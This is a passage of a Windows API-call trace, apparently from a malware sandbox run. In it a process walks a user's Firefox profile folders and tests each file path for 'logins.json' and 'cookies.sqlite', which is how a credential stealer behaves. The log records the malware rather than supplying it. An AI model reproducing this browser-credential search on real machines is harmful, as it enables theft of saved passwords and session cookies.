[0160.839] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.839] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.839] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht", cAlternateFileName="818200~1")) returned 1 [0160.839] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0160.839] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0160.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0160.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0160.839] lstrlenW (lpString="\\") returned 1 [0160.839] GetProcessHeap () returned 0x8e0000 [0160.839] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x9258b8 [0160.839] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.839] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0160.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0160.839] lstrlenW (lpString="818200132aebmoouht") returned 18 [0160.839] GetProcessHeap () returned 0x8e0000 [0160.839] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x9259b8 [0160.839] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0160.839] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0160.839] VirtualQuery (in: lpAddress=0x9258b8, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.839] GetProcessHeap () returned 0x8e0000 [0160.839] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9258b8 | out: hHeap=0x8e0000) returned 1 [0160.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0160.839] lstrlenW (lpString="") returned 0 [0160.839] GetProcessHeap () returned 0x8e0000 [0160.840] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925ae0 [0160.840] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0160.840] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0160.840] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0160.840] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0160.840] lstrlenW (lpString="\\*.*") returned 4 [0160.840] GetProcessHeap () returned 0x8e0000 [0160.840] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x925c08 [0160.840] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0160.840] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*" [0160.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0160.842] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.842] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName="..", cAlternateFileName="")) returned 1 [0160.842] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.842] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.842] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName="..", cAlternateFileName="")) returned 0 [0160.842] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0160.842] VirtualQuery (in: lpAddress=0x925c08, lpBuffer=0x2ded4c, dwLength=0x1c | out: lpBuffer=0x2ded4c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.842] GetProcessHeap () returned 0x8e0000 [0160.842] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925c08 | out: hHeap=0x8e0000) returned 1 [0160.842] VirtualQuery (in: lpAddress=0x925ae0, lpBuffer=0x2ded4c, dwLength=0x1c | out: lpBuffer=0x2ded4c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.842] GetProcessHeap () returned 0x8e0000 [0160.842] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ae0 | out: hHeap=0x8e0000) returned 1 [0160.842] VirtualQuery (in: lpAddress=0x9259b8, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.842] GetProcessHeap () returned 0x8e0000 [0160.842] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259b8 | out: hHeap=0x8e0000) returned 1 [0160.842] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0160.842] lstrlenW (lpString="\\") returned 1 [0160.842] GetProcessHeap () returned 0x8e0000 [0160.842] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x9258b8 [0160.842] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.842] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0160.842] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0160.842] lstrlenW (lpString="818200132aebmoouht") returned 18 [0160.842] GetProcessHeap () returned 0x8e0000 [0160.842] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x9259b8 [0160.842] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0160.842] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0160.842] VirtualQuery (in: lpAddress=0x9258b8, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.842] GetProcessHeap () returned 0x8e0000 [0160.842] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9258b8 | out: hHeap=0x8e0000) returned 1 [0160.843] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="logins.json") returned 0x0 [0160.843] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="cookies.sqlite") returned 0x0 [0160.843] VirtualQuery (in: lpAddress=0x9259b8, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.843] GetProcessHeap () returned 0x8e0000 [0160.843] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259b8 | out: hHeap=0x8e0000) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 1 [0160.843] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0160.843] lstrlenW (lpString="\\") returned 1 [0160.843] GetProcessHeap () returned 0x8e0000 [0160.843] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x9258b8 [0160.843] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.843] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0160.843] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0160.843] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0160.843] GetProcessHeap () returned 0x8e0000 [0160.843] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x128) returned 0x9259b8 [0160.843] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0160.843] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0160.843] VirtualQuery (in: lpAddress=0x9258b8, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.843] GetProcessHeap () returned 0x8e0000 [0160.843] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9258b8 | out: hHeap=0x8e0000) returned 1 [0160.843] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="logins.json") returned 0x0 [0160.843] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.843] VirtualQuery (in: lpAddress=0x9259b8, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.843] GetProcessHeap () returned 0x8e0000 [0160.843] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259b8 | out: hHeap=0x8e0000) returned 1 [0160.843] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 0 [0160.843] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0160.843] VirtualQuery (in: lpAddress=0x9257b0, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.843] GetProcessHeap () returned 0x8e0000 [0160.844] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257b0 | out: hHeap=0x8e0000) returned 1 [0160.844] VirtualQuery (in: lpAddress=0x9256b0, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.844] GetProcessHeap () returned 0x8e0000 [0160.844] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b0 | out: hHeap=0x8e0000) returned 1 [0160.844] VirtualQuery (in: lpAddress=0x9255b0, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.844] GetProcessHeap () returned 0x8e0000 [0160.844] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255b0 | out: hHeap=0x8e0000) returned 1 [0160.844] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0160.844] lstrlenW (lpString="\\") returned 1 [0160.844] GetProcessHeap () returned 0x8e0000 [0160.844] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x9254b8 [0160.844] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.844] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0160.844] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0160.844] lstrlenW (lpString="idb") returned 3 [0160.844] GetProcessHeap () returned 0x8e0000 [0160.844] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x9255b0 [0160.844] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0160.844] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.844] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.844] GetProcessHeap () returned 0x8e0000 [0160.844] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0160.844] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="logins.json") returned 0x0 [0160.844] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="cookies.sqlite") returned 0x0 [0160.844] VirtualQuery (in: lpAddress=0x9255b0, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, 